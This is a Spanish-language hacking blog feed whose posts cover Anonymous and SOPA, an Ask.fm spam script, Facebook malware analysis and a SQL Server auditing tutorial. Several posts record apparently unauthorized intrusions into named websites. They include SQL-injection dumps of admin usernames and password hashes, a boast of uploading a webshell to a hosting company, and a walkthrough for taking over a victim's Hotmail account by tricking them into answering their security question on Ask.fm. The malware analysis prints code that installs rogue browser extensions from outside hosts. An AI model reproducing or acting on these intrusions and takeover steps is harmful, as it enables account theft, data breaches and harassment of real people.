in[S]eguridad [I]nformatica

¿quién desató la guerra cibernética en estados unidos?

2012-01-20T22:34:00.000-08:00

La red está en guerra. El grupo Anonymous ha saboteado los sitios web del FBI, el Ministerio de Justicia estadounidense y algunas casas discográficas en protesta contra el cierre del portal Megaupload. Pero los analistas creen que esta guerra cibernética fue desatada por las mismas autoridades que intentando controlar la red no dejaron otra salida a la ciudadanía que luchar.

En un vídeo colgado en YouTube, un grupo de activistas de Anonymus asumió la responsabilidad de los sabotajes de los portales del Gobierno federal estadounidense, entre ellos el sitio del FBI, de Justicia y de la Casa Blanca. 5.000 usuarios asociados a este grupo lograron dejar inaccesibles esos portales generando una sobrecarga por numerosas entradas a sus páginas de internet. "Somos el 99%, somos Anonymous", publicó el grupo en la red social de Twitter.

Google y Wikipedia se habían unido a la protesta y se alcanzaron los primeros resultados de la lucha: el Congreso estadounidense decidió hace unas horas posponer los debates de las leyes contra la piratería cibernética.

El miembro de la organización Vamos Unidos USA Juan José Gutiérrez cree que la Casa Blanca está preocupada porque no puede controlar la información en la red. Y por eso Washington incrementa el espionaje no solo a sus ciudadanos, sino al resto de personas en internet.

La guerra cibernética ya ha comenzado. No creo que la inició la ciudadanía, más bien pienso que la iniciaron los gobiernos que están preocupados porque circulan sin controles ideas, se intercambian materiales entre los ciudadanos de países a larga y corta distancia y a final de cuentas de todo el mundo. Particularmente si eso implica acción social que cuestione el autoritarismo, ese está siendo el sentir desde hace años por parte de las autoridades en contra de la ciudadanía", comentó Gutiérrez a RT.

El analista considera que EE. UU. no solamente puede incrementar el espionaje en contra de sus ciudadanos y de sus no ciudadanos en todo el mundo, "de hecho lo han estado incrementando. Básicamente las autoridades decidirían quiénes, bajo sospecha de estar infringiendo las leyes de derecho de autor, las autoridades tendrían el derecho de proceder en contra de estas personas antes de que se pudiera comprobar culpabilidad. Eso demuestra una vez más lo erróneo de estas políticas porque una vez más bajo el argumento de proteger en este caso la propiedad intelectual -la música, películas y otros contenidos de carácter comercial-, lo que realmente se estaría haciendo es restringir y sumarle control a la red. Es decir, la ciudadanía tendría cada vez menos control sobre esta herramienta de información y de intercambio de información", dijo.

Algunos expertos, como por ejemplo Barrett Brown, un colaborador de Anonymous, creen que estos conflictos entre los activistas de la red y las autoridades de EE. UU. en el mundo podrían escalar a niveles desproporcionados.

"El problema es que el comportamiento del Gobierno norteamericano y el del resto de países, en el caso de que les otorguemos poderes para hacer una cosa, casi siempre la interpretan a su manera para que puedan hacer cosas aún mayores. El operativo contra el sitio Megaupload demuestra que incluso antes de que la Ley antipirata entre en vigor, han arrestado a sus dueños y han cerrado la página. Imagínense qué sucederá cuando aprueben la SOPA. Mi grupo ya inició una operación pensada para asegurarnos de que SOPA sea derrotada y los que la apoyan resulten intimidados, para que estemos seguros de que no vuelven a pasar cosas como esta", contó a RT Barrett Brown.

Articulo completo en: http://actualidad.rt.com/actualidad/ee_uu/issue_35110.html

FuckingAskFM! SCRIPT SPAM para ASK.FM

2012-01-06T00:05:00.000-08:00

Caprichos y más caprichos, este es uno de los tantos que tengo ahora, y como no tengo nada que hacer y mi novia esta de viaje, pues que más se puede hacer, y para divertirme un rato FuckingAskFM!...

Después de haber hablado un poco del peligro de usar ese famoso sistema de preguntas llamado ~~Fucking~~Ask.FM y nadie sigue los concejos pues decidí crear un script de SPAM ( y más que todo, un metodo para promocionar mi blog ajjaja), para ver si algún día se acabe esa perderá de tiempo (no se que le ven de bueno responder preguntas).

El script consiste en enviar muchos mensajes al mismo perfil para saturar la cuenta, (y molestar personas jajaja) para que al fin se den cuenta de que eso no sirve, es una mierda.

Viernes 6 de Enero de 2012 - 2:40AM
Hasta el momento, tengo es script que manda las solicitudes, ahora no más falta diseñar algo básico para la presentación.

Viernes 6 de Enero de 2012 - 3:30AM
Ya tengo el diseño, hasta ahora el script funciona de la siguiente manera:

1.Se ingresa el nick del usuario victima.
2.Se ingresa el mensaje SPAM.
3.Se ingresa el número de veces que se realizará la petición.

Ahora, sólo queda montarlo a mi hosting.

Viernes 6 de Enero de 2012 - 4:04AM
Ya esta todo listo, quedaré a la espera de ahora levantarme temprano y codearlo de forma automática. Más información ver la nota mental.

NOTA MENTAL
Se me ha ocurrido, esparcir mi script automáticamente, realizando primero una petición a la pagina principal de Ask.FM sacando los perfiles que se muestran en el footer (más publicidad muhahahaha).

Feliz año nuevo amigos h4x0rs! [2012]

2011-12-31T00:36:00.000-08:00

Él, mi gran mentor, un dia me dijo que mi vida era como un gran libro que se escribe día tras día y que lo cierre cuando se acabe. Él me lo enseño todo, mi vida y espíritu me pertenecen y sin él no sería lo que soy ahora.

Feliz navidad mis queridos amigos...
@Kevin Astroz, @Dario Skywálker, @Mike Brian y a los muchos otros que me ayudaron...

LA NUEVA VARIANTE DEL MALWARE DE FACEBOOK

2011-12-19T21:50:00.000-08:00

Ya es demasiado para caer de nuevo en los malwares de esta red social.

De nuevo el mismo malware se esta esparciendo por toda la red social como si nunca hubiera existido, ya se ha explicado muchas veces que hay que tener cuidado con los enlaces externos.

Lo que me llama la atención es que cambiaron la interface por una más, como se podría llamar eso, ¿Llamativa?, ya que ahora parece como si estuvieras ingresando a youtube.com, -cabe destacar que tiene la nueva interfaz de usuario-, hay que darle puntos por ser tan creativo.

Analizaré de nuevo el código a ver sí lo han mejorado un poco, la primer dirección que tengo es woutubewatch1.blogspot.com, y tenemos lo siguiente,

Ahora el perfil apunta a profile/08956306515188510108, tiene el mismo iframe, pero esta vez a,

#
<iframe
         class = "change"
   frameborder = "0"
        height = "300"
     scrolling = "no"
           src = "http://realityvidb.info/plugin.html?id=31"
         video = "16"
         width = "500">
</iframe>
#

Al parecer cambiaron de código por otro wiiii, en el nuevo dominio, tenemos la siguiente función, que es la principal, donde se instala el complemento, llamada instalar(), -que tan obvio-...

#
  # PRIMERO VERIFICAMOS EL NAVEGADOR PARA INSTALAR EL PLUG-IN
  var is_chrome,is_firefox;
  is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
  is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

  # DESPUÉS SE EJECUTA LA FUNCIÓN
  function instalar() {
    if (is_chrome) {
      click_img();
      window.open("http://realityvidb.info/b/youtubees.crx");
    }else if (is_firefox){
      click_img();
      var params = {
        "Youtube Extension":{
          URL      : "http://realityvidb.info/b/youtubees.xpi",
          toString : function (){ return this.URL; }
        }
      };
      InstallTrigger.install(params);
    }else{
      window.open("http://www.google.com/chrome/eula.html");
    }
  }
#

También existe una función donde carga una imagen, igual que la que encontró mi amigo @alguien, -tendré que esperarlo a ver si me ayuda con una duda que tengo-,

#
  function click_img(){
    var body=document.getElementsByTagName("body")[0];
    if(body==null)return false;
    var img=document.createElement("img");
    img.src="http://whos.amung.us/swidget/installpez.gif";
    img.width="0";
    img.height="0";
    img.border="0";
    body.appendChild(img);
  }
#

Todavía queda por analizar unas cuantas cosas, pero esperaré un momento, recordemos como eliminarlo.
Para Google Chrome Para Firefox

MALWARE DE NUEVO EN FACEBOOK

2011-12-11T22:11:00.000-08:00

El día de hoy Lunes 12 de Diciembre de 2011, a las 12:15 A.M, inicia el mini análisis del malware que ronda por Facebook.

Como primer movimiento tenemos la pagina tuqam5.blogspot.com, que por ahora será la principal del sitio del malware.

Cuando ingresamos a la URL, nos aparece la siguiente pantalla, pidiéndonos descargar un supuesto plug-in de Youtube.

Imagen 1: Descarga de plug-in.

Ahora nos pide que lo instalemos, (Hasta sale el logo de Youtube jajajaja),

Imagen 2: Instalación plug-in.

Ahora no se que más sigue, no lo instalaré para auto infectarme. Miro el código fuente del blogger y me encuentro el siguiente enlace a otro website, ahora la pagina principal del malware es vevideo.com.es,

<iframe frameborder = "0"
        height      = "300"
        id          = "change"
        scrolling   = "no"
        src         = "http://vevideo.com.es/plugin/plugin.php"
        width       = "500">
</iframe>

Descargo el supuesto plug-in y miro su código fuente, esto es lo que realmente nos interesa. Me encuentro con la siguiente función, supongo que será la que se cargará, además tiene la misma dirección anterior.

function loadScript_you() {
   if ('https:' == document.location.protocol) return false;
   var s = document.createElement('script');
   s.setAttribute("type","text/javascript");
   s.setAttribute("src", "http://vevideo.com.es/plugin/script.js");
   var head=document.getElementsByTagName("head")[0];
   if( head==null) return false;
   head.appendChild(s);
   return true;
}

Analizando encuentro una lista de blogs, supongo que serán del autor del malware, de no ser así, porque estaría allí?, (te detecte querido malwariento ajjajaja).

var blogs = new Array();
blogs[0] = 'http://deco11.blogspot.com/';
blogs[1] = 'http://decu12.blogspot.com/';
blogs[2] = 'http://decu13.blogspot.com/';
blogs[3] = 'http://decu14.blogspot.com/';
blogs[4] = 'http://decu15.blogspot.com/';
blogs[5] = 'http://decu16.blogspot.com/';
blogs[6] = 'http://decu17.blogspot.com/';
blogs[7] = 'http://decu18.blogspot.com/';
blogs[8] = 'http://decu19.blogspot.com/';
blogs[9] = 'http://decu20.blogspot.com/';

Verifico el perfil y no dice gran cosa, pero me llamo la atención que la localidad donde se encuentra el supuestro creado del malware es Pasto : Nariño : Colombia, (a pesar de todo los pastusos no son tan tontos como dicen que son).

Este es el script que se encarga de realizar el malware, como siempre esta ofuscado, vamos a nuestra querida website jsbeautifier.org y lo desofuscamos.

... y seguimos con otro listado de blogs, algunos de ellos ya deshabilitados, pero todos con el mismo contenido.

[+] goldenboif.blogspot.com
[+] deco11.blogspot.com
[+] decu12.blogspot.com
[+] decu13.blogspot.com
[+] decu14.blogspot.com
[+] decu15.blogspot.com
[+] decu16.blogspot.com
[+] decu17.blogspot.com
[+] decu18.blogspot.com
[+] decu19.blogspot.com
[+] decu20.blogspot.com
[+] tuqam5.blogspot.com
[+] tytyty22.blogspot.com
[+] tytyty33.blogspot.com
[+] tytyty44.blogspot.com
[+] ferdie11.blogspot.com
[+] ferdie22.blogspot.com
[+] ferdie333.blogspot.com
[+] ferdie44.blogspot.com
[+] gorth11.blogspot.com
[+] gorth22.blogspot.com
[+] gorth33.blogspot.com
[+] gorth44.blogspot.com
[+] poiuyt11.blogspot.com
[+] poiuyt22.blogspot.com
[+] poiuyt33.blogspot.com
[+] poiuyt44.blogspot.com
[+] poiuyt55.blogspot.com
[+] dutter11.blogspot.com
[+] dutter22.blogspot.com
[+] dutter33.blogspot.com
[+] dutter44.blogspot.com
[+] dutter55.blogspot.com
[+] means2.blogspot.com
[+] means22.blogspot.com
[+] means3.blogspot.com
[+] means4.blogspot.com
[+] means55.blogspot.com
[+] futtw11.blogspot.com
[+] futtw22.blogspot.com
[+] futtw33.blogspot.com
[+] futtw44.blogspot.com
[+] futtw55.blogspot.com
[+] roter1.blogspot.com
[+] roter2.blogspot.com
[+] roter3.blogspot.com
[+] roter4.blogspot.com
[+] roter5.blogspot.com
[+] rastar11.blogspot.com
[+] rastar12.blogspot.com
[+] rastar13.blogspot.com
[+] rastar14.blogspot.com
[+] rastar15.blogspot.com
[+] holy11.blogspot.com
[+] hosly22.blogspot.com
[+] hosly333.blogspot.com
[+] hosly44.blogspot.com
[+] hosly55.blogspot.com
[+] fukity11.blogspot.com
[+] fukity22.blogspot.com
[+] fukity33.blogspot.com
[+] fukity44.blogspot.com
[+] fukity55.blogspot.com
[+] floress22.blogspot.com
[+] guddp11.blogspot.com
[+] guddp22.blogspot.com
[+] guddp33.blogspot.com
[+] guddp44.blogspot.com
[+] vulyt55.blogspot.com
[+] vulyt44.blogspot.com
[+] vulyt33.blogspot.com
[+] vulyt22.blogspot.com
[+] vulyt11.blogspot.com
[+] bulyr11.blogspot.com
[+] bulyr22.blogspot.com
[+] bulyr33.blogspot.com
[+] bulyr44.blogspot.com
[+] bulyr55.blogspot.com
[+] vulty11.blogspot.com
[+] vulty22.blogspot.com
[+] vulty33.blogspot.com
[+] foly44.blogspot.com
[+] gelkh11.blogspot.com
[+] goli11.blogspot.com
[+] goli22.blogspot.com
[+] goli33.blogspot.com
[+] goli44.blogspot.com
[+] gelkh22.blogspot.com
[+] gelkh33.blogspot.com
[+] gelkh44.blogspot.com
[+] gelko55.blogspot.com
[+] gelko66.blogspot.com
[+] gelko77.blogspot.com
[+] gelko88.blogspot.com
[+] gelko11.blogspot.com
[+] gelko22.blogspot.com
[+] gelko33.blogspot.com
[+] gelko44.blogspot.com
[+] julip22.blogspot.com
[+] julip33.blogspot.com
[+] bloll8.blogspot.com
[+] holk66.blogspot.com
[+] holk55.blogspot.com
[+] holk77.blogspot.com
[+] holk88.blogspot.com
[+] hy6y6.blogspot.com
[+] hy6y7.blogspot.com
[+] julip88.blogspot.com
[+] julip99.blogspot.com
[+] bloqq3.blogspot.com
[+] bloqq4.blogspot.com
[+] bloyy5.blogspot.com
[+] bloyy6.blogspot.com
[+] kolk11.blogspot.com
[+] kolkk22.blogspot.com

Encuentro la función que es usada para repartir el malware en Facebook y no me gusto, se nota instantaneamente que fue codeado por un n00b. Ya no diré más, dejaré hasta acá, no perderé más mi tiempo, pensé que era más avanzado.

ELIMINAR MALWARE!

Al ver el código tan básico se me olvidaba decir como eliminarlo, es una extensión ( *.crx | *.xpi ) así que mirad lo siguiente,

Para Google Chrome
Para Firefox

EL PELIGRO DE USAR [ask.fm]

2011-12-05T21:32:00.000-08:00

Desde hace algunos días veo que varios contactos de mi facebook, responden preguntas mediante el mecanismo llamado ask.fm.

¿CÓMO FUNCIONA ESTO?

Simple, es una pagina donde los usuarios ingresan y crean una cuenta, y personas conocidas o anónimas pueden ingresar y realizarte cualquier pregunta, mientras tú la respondes. (Se supone que debe de ser sincera la respuesta, pero hay personas que preguntan hasta: ¿Cuantas veces vas al baño? y algunos llegan al extremo de preguntar: ¿A que vas al baño? ajjajaja).

¿CÓMO PUEDE LLEGAR A SER ESTO PELIGROSO?

Tambien es simple, hay personas que no les importa contestar sinceramente las preguntas, -así deberían de ser todos, pues este es el fin de la pagina, o sino para que lo creaste?-, el caso es qué al contestar la pregunta estas dando casi un 90% de acierto para que puedan robarte tu cuenta de correo, o ya no te acuerdas que hotmail ofrece la oportunidad de devolver la cuenta de correo mediante una pregunta que previamente cuando creaste tu cuenta debiste de responder?

No se para que mie#"! la gente crea una cuenta en ask.fm, no se que le ven de interesante estar respondiendo preguntas que a los otros ni les interesa, sólo preguntan para mostrarse al mundo, que EXISTEN.

NO ME CREEN? MIREN UN EJEMPLO.

Seleccionamos nuestra victima en facebook, en la información buscamos la cuenta de correo que usa para conectarse en esta red social.

Imagen 1: Correo electronico del perfil de la victima.

Ahora, vamos a Cuenta ► Restablecer la contraseña y seleccionamos la opción de He olvidado mi contraseña.

Imagen 2: Seleccionando opción para averiguar pregunta secreta de la cuenta.

Ahora nos muestra una caja de texto para ingresar la cuenta de correo del perfil victima y la captcha de seguridad,

Imagen 3: Cuenta de correo y captcha.

Los ingresamos y nos mostrará la siguiente información, (puede variar ya que algunas personas seleccionan la opción de sólo restablecer la cuenta de correo sólo al correo alternativo, mmm eso me hace acordar de algo EL BUG DEL CORREO ALTERNATIVO [HOTMAIL])

Imagen 4: Respuesta a la pregunta de seguridad.

Aquí es donde debemos de usar nuestra ingeniería social, para realizar la pregunta en la cuenta de la victima en ask.fm, miremos:

Imagen 5: Pregunta y respuesta en ask.fm

NOTA: Que se note la pregunta tan directa que realice, me dio tan duro pensarla ajajajajajjaa

Ahora volvemos a hotmail, ingresamos la respuesta que nos dieron y VOALA!

Imagen 6: Pantalla para cambiar la contraseña.

Así que antes de responder, recuerda cual es tu pregunta de seguridad en todas las cuentas de correo que tengas enlazadas a tu perfil en facebook.

NI LOS MUERTOS SE SALVAN

2011-12-01T23:22:00.000-08:00

#
# BASE DE DATOS
CURRENT DB: wwwjardines

#TABLAS
COUNT(table_name) OF information_schema.tables WHERE table_schema=0x7777776A617264696E6573 IS 32 TABLES FOUND:
[+] Aspirante
[+] Banner
[+] CategoriaInstalacion
[+] CategoriaProducto
[+] Ciudad
[+] ConsultaExepaz
[+] ConsultaMemorial
[+] Convenio
[+] Departamento
[+] DocumentoNoticia
[+] FormularioContacto
[+] FormularioProducto
[+] GaleriaInstalacion
[+] GaleriaNoticia
[+] GaleriaProducto
[+] Instalacion
[+] Log
[+] MapaLote
[+] Noticia
[+] NoticiaModulo
[+] Obituario
[+] Pais
[+] Parametros
[+] Perfil
[+] PlanExepaz
[+] Producto
[+] Registro
[+] Sesion
[+] Sesion_Cliente
[+] TipoContacto
[+] Usuario
[+] VideoNoticia

#COLUMNAS
COUNT(column_name) OF information_schema.columns WHERE table_schema=0x7777776A617264696E6573 AND table_name=0x5573756172696F IS 17 COLUMNS FOUND:
[+] IDUsuario
[+] IDPais
[+] IDDepartamento
[+] IDCiudad
[+] IDPerfil
[+] Nombre
[+] Telefono
[+] User
[+] Password
[+] EmaiL
[+] Autorizado
[+] Nivel
[+] Lenguaje
[+] FechaTrCr
[+] UsuarioTrCr
[+] UsuarioTrEd
[+] FechaTrEd

#REGISTROS
COUNT(*) OF wwwjardines.Usuario IS 1
Data Found: Password=1d2440cb12e1ce5a
Data Found: User=soluciones
#

AUDITORÍA DE SEGURIDAD EN SQL SERVER 2008

2011-12-01T11:38:00.000-08:00

La primera pregunta que nos surge es: ¿Porque auditamos?

Revisando la literatura de auditoría de seguridad, los autores coinciden en que el tener políticas de seguridad es un factor crítico para mantener los datos seguros. La auditoría también nos ayuda a identificar lo que accedió un intruso en el evento de que un ataque sea exitoso.

En SQL 2005 el enfoque estaba orientado a asegurarse de que el usuario no tuviera privilegio mayores a los que necesitaba y que los cambios fueran realizados por el personal autorizado. La herramienta que se promovía para auditar los cambios a la base de datos era el SQL Profiler ya que podía auditar cambios al esquema, operaciones de insertar, actualizar o eliminar registros; y eventos relacionados con cambios de permisos o la creación de nuevos Logins.

Una de las mejoras que trajo SQL Server 2008 Enterprise es un incremento en la capacidad de auditoría a través del uso del SQL Server Audit. A través de esta funcionalidad se puede rastrear y registrar de forma automática los eventos que ocurren a nivel del servidor o a nivel de la base de datos. Esto es posible a través del uso del objeto Audit. Veamos entonces como crear una auditoría, como crear y habilitar una especificación de auditoría a nivel de Servidor o a nivel de base de datos y como visualizar los registros de auditoría.

CREAR UNA AUDITORÍA

Un objeto de auditoría es una colección de una o más acciones individuales o un grupo de acciones que podrán ser rastreadas. Por ejemplo, se puede configurar un objeto de auditoría para identificar todos los logins fallidos. Los eventos se escriben en la localización que se especifique. Se pueden almacenar en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad.

El objeto de auditoría se puede crear a través del Management Studio (SSMS) o utilizando T-SQL. Desde SSMS se debe presionar el botón de la derecha del mouse sobre la opción New Audit localizada en la carpeta de auditoría bajo el árbol de Seguridad, como se muestra a continuación:

En la pantalla Create Audit se debe ingresar el nombre del objeto de auditoría, y se debe especificar el destino. Si se indica que el destino será un archivo, hay que especificar la ruta donde será almacenado. Finalmente se debe presionar el botón OK para crear el objeto de auditoría.

Para propósitos de este ejemplo cree un segundo objeto de auditoría e ingrese el nombre "AuditarConsultasTablaEmpleado". Seleccione como destino un archivo e indique la ruta donde desee almacenarlo. Ambos objetos estarán localizados bajo la carpeta Audits, como se muestra a continuación. Este objeto de auditoría se utilizará para rastrear las transacciones SELECT realizadas contra la tabla HumanResources.Employee de la base de datos AdventureWorks2008R2.

Si desea crear un objeto de auditoría a través de T-SQL lo puede hacer utilizando el comando CREATE SERVER AUDIT. La siguiente consulta crea el objeto "AuditarConsultasTablaEmpleado". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE SERVER AUDIT [AuditarConsultasTablaEmpleado]
TO FILE  (FILEPATH = N'C:\TEMP');
#

CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE SERVIDOR

Una vez se ha creado los objetos de auditoría, el siguiente paso es crear las especificaciones apropiadas de auditoría. Las especificaciones de auditoría le indican al objeto de auditoría lo que debe rastrear. En el caso del objeto de auditoría llamado "AuditarLoginsFallidos", debemos crear una especificación que busque los logins que no son exitosos. Para lograrlo debemos seleccionar el botón de la derecha del mouse sobre la carpeta "Server Audit Specifications" ubicada bajo el árbol de Seguridad.

Asigne a la especificación de auditoría el nombre: "EspecificacionAuditoriaServidor-LoginsFallidos". Bajo audit seleccione la opción "AuditarLoginsFallidos". Esto asignará la especificación de auditoría "EspecificacionAuditoriaServidor-LoginsFallidos" al objeto de auditoría "AuditarLoginsFallidos". Seleccione el tipo de acción para auditar: "FAILED_LOGIN_GROUP" y presione OK para crear y asignar el objeto de auditoría.

Presione el botón de la derecha del mouse sobre "EspecificacionAuditoriaServidor-LoginsFallidos" para habilitar la especificación a través de la opción: "Enable Server Audit Specification"

Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre "AuditarLoginsFallidos" para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.

Si desea crear una especificación de auditoría a nivel de servidor, a través de T-SQL, lo puede hacer utilizando el comando CREATE SERVER AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría "EspecificacionAuditoriaServidor-LoginsFallidos". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE SERVER AUDIT SPECIFICATION [EspecificacionAuditoriaServidor-LoginsFallidos]
FOR SERVER AUDIT [AuditarLoginsFallidos]
ADD (FAILED_LOGIN_GROUP) WITH (STATE = ON)
GO
#

CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE BASE DE DATOS

Para crear y habilitar una especificación de auditoría a nivel de base de datos debe expandir la base de datos, en este ejemplo utilice AdventureWorks2008R2, y seleccione con el botón de la derecha del mouse la opción "Audit Specifications" bajo el árbol de seguridad de la base de datos. Seleccione la opción "New Database Audit Specification" y asigne un nombre (para propósito de este ejemplo asignaremos el nombre: "EspecificacionAuditoriaDB-ConsultasTablaEmpleado")

Como se muestra en la siguiente figura, seleccione la opción "AuditarConsultasTablaEmpleado" Bajo audit. Esto asignará la especificación de auditoría "EspecificacionAuditoriaDB-ConsultasTablaEmpleado" al objeto de auditoría "AuditarConsultasTablaEmpleado".

NOTA: La clase de objeto se utiliza para indicar lo que se quiere auditar. Las opciones son: Objeto, Base de datos o Esquema. Seleccione objeto para auditar Tablas, Funciones, Procedimientos Almacenados o Vistas. El nombre del Principal son entidades que pueden solicitar recursos de SQL Server.

Para propósitos de este ejemplo, seleccione "SELECT" en el tipo de acción para auditar; en la clase del objeto seleccione "OBJECT"; en el nombre del objeto ingrese [HumanResources].[Employee]; en el nombre del Principal ingrese [public] y presione OK para crear y asignar el objeto de auditoría.

Esto permite rastrear las consultas con SELECT que realizan todos los usuarios a la tabla [HumanResources].[Employee].

Presione el botón de la derecha del mouse sobre "EspecificacionAuditoriaDB-ConsultasTablaEmpleado" para habilitar la especificación a través de la opción: "Enable Database Audit Specification"

Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre "AuditarConsultasTablaEmpleado" para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.

Si desea crear una especificación de auditoría a nivel de base de datos, a través de T-SQL, lo puede hacer utilizando el comando CREATE DATABASE AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría "EspecificacionAuditoriaDB-ConsultasTablaEmpleado". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE DATABASE AUDIT SPECIFICATION [DatabaseAuditSpec-EmployeesTable]
FOR SERVER AUDIT [Audit-EmployeeQueries]
ADD (SELECT ON OBJECT::[HumanResources].[Employee] BY [public])
WITH (STATE = ON)
GO
#

VISUALIZAR LOS REGISTROS DE AUDITORÍA

Los registros de auditoría pueden ser accedidos a través la opción "View Audit Logs" o a través de la bitácora de eventos de aplicaciones o de seguridad, dependiendo de dónde se especificó que se almacenaría la auditoría.

Los resultados pueden ser filtrados o inclusive hasta exportados en los siguientes formatos: log, csv y txt.

CONCLUSIÓN

La auditoría en SQL 2008 Enterprise es muy poderosa y flexible ya que permite crear auditorías a nivel de servidor o a nivel de base de datos. La configuración es sencilla ya que solo se requiere especificar donde se almacenará la auditoría (en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad), que objeto se desea auditar (Base de datos, Esquema, Tablas, Funciones, Procedimientos Almacenados o Vistas) y para cual Principal (entidades que pueden solicitar recursos de SQL Server).

Leido en: blogs.technet.com

VENTAS POR INTERNET? MIS POLAINAS

2011-11-23T22:09:00.000-08:00

TABLAS

Count(table_name) of information_schema.tables Where table_schema=0x73756E72697365 is 24
Table found: cargo
Table found: cart
Table found: categoria
Table found: coleccion
Table found: configuracion_compra
Table found: costo_envio
Table found: item_orden
Table found: item_pedido
Table found: moneda
Table found: orden_compra
Table found: pedido
Table found: producto
Table found: talla
Table found: tallaje
Table found: tbl_cart
Table found: tbl_category
Table found: tbl_costo_envio
Table found: tbl_currency
Table found: tbl_order
Table found: tbl_order_item
Table found: tbl_product
Table found: tbl_shop_config
Table found: tbl_user
Table found: user_sunrise

COLUMNAS

Count(column_name) of information_schema.columns Where table_schema=0x73756E72697365 AND table_name=0x757365725F73756E72697365 is 8
Column found: codigo
Column found: nombres
Column found: apellidos
Column found: login
Column found: passw
Column found: fecha_creacion
Column found: ultima_logiada
Column found: cargo

REGISTROS

Count(*) of sunrise.user_sunrise is 5
Data Found: login=a
Data Found: passw=21232f297a57a5a743894a0e4a801fc3

Data Found: login=admin
Data Found: passw=5d88365b1893e60e28794e7e6c19c55d

Data Found: login=greenday
Data Found: passw=0cc175b9c0f1b6a831c399e269772661

Data Found: login=mercadeo
Data Found: passw=80735228c8e9b43410f2b207f0e54fb0

Data Found: login=webmaster
Data Found: passw=009c5a054c0cb6c14a194de438ee5552

VARIAS WEBSHELL ON!

2011-11-23T21:45:00.000-08:00

confidencialcolombia.com NO ES TAN CONFIDENCIAL

2011-11-21T12:30:00.000-08:00

Nuevo liderazgo en periodismo digital.

TABLAS: (sitio_confidencial)

[+] vista 
[+] videografo 
[+] video 
[+] usuario 
[+] tipo_actualizacion 
[+] tendencias_slideshow 
[+] tendencias_home 
[+] tecnologia_slideshow 
[+] tecnologia_home 
[+] sub20_sede 
[+] sub20_partido 
[+] sub20_gol 
[+] sub20_equipo 
[+] seccion 
[+] registro_uniandinos 
[+] politica_slideshow 
[+] politica_home 
[+] opinion_home 
[+] noticia_home 
[+] noticia_asociada 
[+] noticia 
[+] mensaje 
[+] log 
[+] internacional_slideshow 
[+] internacional_home 
[+] indicadores 
[+] gente_slideshow 
[+] vgente_home 
[+] galeria 
[+] fotografo 
[+] foto 
[+] falcon 
[+] estilo_foto 
[+] especial 
[+] elecciones_partidos 
[+] elecciones_medellin 
[+] elecciones_cali 
[+] elecciones_bucaramanga 
[+] elecciones_bogota 
[+] elecciones_barranquilla 
[+] economia_home 
[+] documento 
[+] deportes_slideshow 
[+] deportes_home 
[+] cultura_slideshow 
[+] cultura_home 
[+] contactenos 
[+] comentario 
[+] audiografo 
[+] audio 
[+] amigos 
[+] actualizacion

TABLA: (usuario)

[+] activo
[+] tipo_usuario_id
[+] proveedor_id
[+] cliente_id
[+] grupo_usuarios
[+] tips
[+] direccion_postal
[+] celular
[+] fax
[+] extension
[+] telefono
[+] fecha_nacimiento
[+] password
[+] email
[+] firma
[+] cargo
[+] apellido
[+] nombre
[+] usuario_id

TABLA: usuario: registros

[AUDITORIA DE SEGURIDAD] WEBHosting

2011-11-18T22:44:00.000-08:00

He estado un poco alejado de mi blog, -estoy estudiando otra área muy diferente a la informática-, y quiero hacer algo grande y creo que lo encontré.

Aquí les mostraré una pequeña auditoria a un sitio web encargado de prestar servicios de alojamiento web en plataformas UNIX y Windows NT. Con soporte en ASP, MYSQL, PHP, Java, TOMCAT.

Quiero mostrar una parte en la que muestran porque los clientes que tiene los han elegido para almacenar sus información.

ESTAS SON LAS RAZONES POR LAS QUE MILES DE CLIENTES YA NOS HAN ELEGIDO:

Desarrollo: nuestro equipo de programadores In-House está preparado para responder a las demandas de proyectos complejos, dándonos la tranquilidad de que siempre podremos satisfacer las necesidades de nuestros clientes. Apuntamos constantemente a la innovación y la generación de herramientas propias que nos permitan ofrecer flexibilidad y adaptabilidad.

Seguridad y Mantenimiento: ponemos a su entera disponibilidad la seguridad de nuestros servidores, completamente preparados para la instalación de comercios virtuales de cualquier amplitud y, además, poseemos sistemas de supervisión técnica automatizados y mantenimiento operativo durante las 24 horas del día, los 365 días del año.

Por suerte encontré un upload, en donde me permitía subir una webshell -supongo que no tenia filtro de seguridad para los archivos-, miremos:

if ($users_file != "none") {
   if(!copy($users_file, $copy_path)) {
      echo "El upload fallo!";
   }else{ 
      ?><A HREF="<? echo $my_file; ?>">Upload Completo!</A>
      <? 
         write_total ();
         $fp = fopen ("xxx.xxx", "a+");
         fputs ($fp, "$link,$users_file_name,$height,$width\n");
         fclose($fp);                
      }
   }else{
      echo "<P>Debe seleccionar un archivo para subir<P>"; ?>
      <A HREF="<? echo $PHP_SELF; ?>"><B>Volver al formulario</B></A>
      <?
}

En ese código vemos que no realiza ningún tipo de validación así que podemos subir cualquier clase de archivos.

Ahora ya tengo mi webshell dentro del servidor, que tan pobre es esté servicio que ni un pequeño filtro o es que tan siquiera esconder el upload y mostrarlo sólo a usuarios autenticados.

Tampoco tiene seguridad en sus directorios, puedo moverme entré carpetas del sistema con total disponibilidad, sin ninguna restricción.

Dejaré hasta aquí y más tarde continuaré.

[LIBRO] SQL INJECTION ATTACKS AND DEFENSE

2011-10-19T17:48:00.000-07:00

Muchas personas dicen que saben lo que es la inyección SQL, pero todo lo que han escuchado o experimentado, son ejemplos triviales. Inyección de SQL es una de las vulnerabilidades más devastador que el impacto de un negocio, ya que puede conducir a la exposición de toda la información confidencial almacenada en de una aplicación de base de datos, incluyendo información útil, tales como nombres de usuario, contraseñas, nombres, direcciones, números de teléfono y detalles de tarjetas de crédito.

